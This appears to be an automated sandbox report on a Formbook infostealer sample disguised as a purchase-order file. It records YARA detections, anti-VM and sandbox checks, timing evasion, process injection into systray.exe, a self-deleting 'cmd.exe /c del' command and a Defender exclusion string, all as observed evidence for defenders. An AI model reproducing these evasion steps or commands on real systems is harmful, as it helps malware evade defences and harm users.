          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO-RFQ # 097663899.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@14/8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-RFQ # 097663899.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_01
          Source: PO-RFQ # 097663899.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO-RFQ # 097663899.exeVirustotal: Detection: 30%
          Source: PO-RFQ # 097663899.exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO-RFQ # 097663899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO-RFQ # 097663899.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO-RFQ # 097663899.exe, 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, systray.exe, 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO-RFQ # 097663899.exe, systray.exe
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004150D0 push ebp; iretd
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408A04 push esi; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00415BF3 pushfd ; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041559C push edx; retf
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BF6A push ecx; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004157F7 push ss; ret
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E5BF3 pushfd ; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8A04 push esi; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E50D0 push ebp; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EBFD3 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E57F7 push ss; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E559C push edx; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB40B push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB402 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB46C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85500503575
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO-RFQ # 097663899.exe PID: 5964, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000030D85E4 second address: 00000000030D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000030D897E second address: 00000000030D8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe TID: 5988Thread sleep time: -101015s >= -30000s
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe TID: 4896Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6300Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 5344Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 101015
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.277718252.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000006.00000000.260289089.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.260342638.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000002.494269360.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.277772773.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000002.506618917.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.277772773.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
